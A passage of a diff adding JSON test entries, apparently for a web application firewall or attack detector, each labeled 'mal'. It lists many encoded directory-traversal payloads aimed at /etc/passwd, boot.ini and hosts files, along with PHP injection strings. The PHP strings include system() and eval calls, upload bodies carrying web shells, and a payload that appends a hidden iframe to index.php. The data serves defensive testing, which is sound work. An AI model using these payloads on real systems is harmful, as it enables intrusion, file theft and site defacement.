+  "payload": "/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".%00.%c1%9c.%00.%c1%9cetc%c1%9cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../%252f..../%252f..../%252f..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%c0%qf..%c0%qfboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%c1%1c..%c1%1c..%c1%1c..%c1%1cetc%c1%1cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%255c..%255c..%255c..%255c..%255cetc%255cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e.\\%2e.\\%2e.\\boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?./etc/issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../.%e0%80%af.../.%e0%80%afboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "??%bg%qfboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5c%%32%%65%%32%%65%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?.0x5c?.0x5cetc0x5cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/../../../../../../../../../../../boot.ini%00.html"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%5C../%5C../boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%01%255c..%01%255c..%01%255c..%01%255c..%01%255c..%01%255cetc%255cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../%uEFC8..../%uEFC8etc%uEFC8passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".?%uF025.?%uF025.?%uF025boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../.%bg%qf.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%25c0%25ae%25c0%25ae%c1%afetc%c1%afissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../%c1%9c..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%f8%80%80%80%afboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?.%5c?.%5c?.%5c?.%5c?.%5c?.%5cetc%5cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f8%80%80%80%ae%f8%80%80%80%ae\\%f8%80%80%80%ae%f8%80%80%80%ae\\etc\\passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "??%c0%af??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "......///......///......///......///......///boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "----------397236876\nContent-Disposition: form-data; name=\"custom_attributes[vat_id]\"; filename=\"/tmp/sess_d8ew88tqmabdcokhumchy8htqm\"\nContent-Type: text/plain\n\nmalicious payload\n----------397236876--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B%27a%27%7D%2811%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "compress.bzip2://file.bz2"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20array_map%28%22system%22%2Carray%28%22whoami%22%29%29%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "ssh2.sftp://user:password@example.com:22/path/to/filename"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "c=%24OOO000000%7B0%7D%2815%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%24%24z%2829%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B%27ff%27%7D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "zip://archive.zip"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%22system%22%28ls%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "phar://phpinfo.zip/phpinfo.txt"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "base64_decode()"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%20%09%2f%2a%2a%2f%09%20%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%28system%29%28%27uname%27%29%20%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24___%5B%40-_%5D%2820%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "var=engine%3dtrue"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%09php%20echo%20%22test%22"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "eval%0D%28%24foo%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "filegroup%20%20%28blah%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"photo.php  \"\nContent-Type: application/x-httpd-php\n\n<?php echo 'test'; ?>\n----------397236876--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%20%2f%2fcomment%0d%0a%20%28blah%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "assert_OptionS%20%28%0A%0A%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%3D1%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "compress.zlib://http://www.example.com/some_file.gz"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "is_array()"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "Foo%3A%3A%24variable%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%5BPHP%5Dsystem%28%27whoami%27%29%3B%5B%2FPHP%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%20%20%28blah%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%40%24b374k%28%22foo%22%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%20checkDate%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "zend_test_is_string_marked_as_valid_utf8("
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "var=mbstring.regex_retry_limit%3dtrue"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "------WebKitFormBoundaryoRWIb3busvBrbttO\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php.jpg\"\nContent-Type: image/jpeg\n\n<?php @eval($_POST[\"hacker\"]); ?>\n\n------WebKitFormBoundaryoRWIb3busvBrbttO--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%28sy.%28st%29.em%29%28%27uname%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "echo%20%22test%22%5B%2FPHP%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=%24__%5B%40o%5D%286%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "date_ADD%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "var=mbstring.regex_stack_limit%3dtrue"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%3D1%3Becho%201%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "pi%0b%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "var=opcache.jit_max_polymorphic_calls%3d50"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "x=strrev%28%20%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=%24__%5B%27o%27%5D%285%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "var=precision%3dtrue"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "(sy.(st).em)(%40id)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "odbc_connection_string_should_quote("
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B%24foo-%3Ebar%7D%28200%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20echo%20file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3FpHp%20echo%20%22test%22"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "------WebKitFormBoundaryoRWIb3busvBrbttO\nContent-Disposition: form-data; name=\"file\"; filename=\"test.phar.png\"\nContent-Type: image/png\n\n<?php @eval(base64_decode($_COOKIE[\"payload\"])); ?>\n\n------WebKitFormBoundaryoRWIb3busvBrbttO--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "x=%3C%3Fphp%20assert%28%24_POST%5B%27c%27%5D%29%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "test=ZlIb%5fDeCoDe=(bla)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "intval(foo)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "touch%2f%2aa%0d%0ab%2a%2f%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "range%20%09%2f%2ax%2a%2f%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%2f%2acomment%2a%2f%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%20php%20echo%20%22test%22"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%09%28blah%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "chr%28123%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "ssh2.tunnel://user:password@example.com:22/10.0.0.1:25"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "somePhpWouldGoHere%5B%2Fphp%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "test%3C%3F"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "test=Shell%5fexec=(bla)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "eval%28%27runExploit%28%29%27%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "code=%3C%3Fphp%20passthru%28%27ls%20-la%27%29%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20%24f%3Dfopen%28%27shell.php%27%2C%27w%27%29%3B%20fwrite%28%24f%2C%27%3C%3Fphp%20eval%28%24_GET%5Bc%5D%29%3B%20%3F%3E%27%29%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%20%3Aexec%28%27cat%20%2Fetc%2Fpasswd%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "bzdecomprEss()"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=%24_%283%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%0A%3Aecho%201%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=get_defined_vars%28%29%5B0%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "cmd=(system)(whoami)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "fopen%20%20%28blah%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B_.__%7D%2830%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3FPHP%20echo%20%22test%22%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%22%5Cx73y%5Cx73tem%22%28ls%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24foo-%3E%24funcname%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%0Aphp%20echo%20%22test%22"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "extension_dir=/path/to/example"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "strip_tags()"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "somePhpWouldGoHere%5B%5Cphp%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%20%3Asystem%28%27ls%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%5Bphp%5Decho%20%27test%27%3B%5B%2Fphp%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%09%3Aecho%201%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "cmd=system(whoami)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=%24%24b%282%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20%24res%20%3D%20%60id%60%3B%20%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "------WebKitFormBoundaryoRWIb3busvBrbttO\nContent-Disposition: form-data; name=\"file\"; filename=\"test. php5.gif\"\nContent-Type: image/gif\n\nplease block me\n\n------WebKitFormBoundaryoRWIb3busvBrbttO--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"something/dangerous.php\"\nContent-Type: text/plain\n\nplease block me\n----------397236876--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "eval%28chr%28112%29.chr%28104%29.chr%28112%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "exec%0A%28%27bar%27%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "value;"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fphp%20echo%20%22test%22"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "$_SERVER['test'];"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "I%20don%27t%20like%20gzuncompress/*comment*/()"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "printf(foo)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3F%09echo%20%22test%22%3B%3F%3E"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24%7B%40%24b%7D%2812%29"
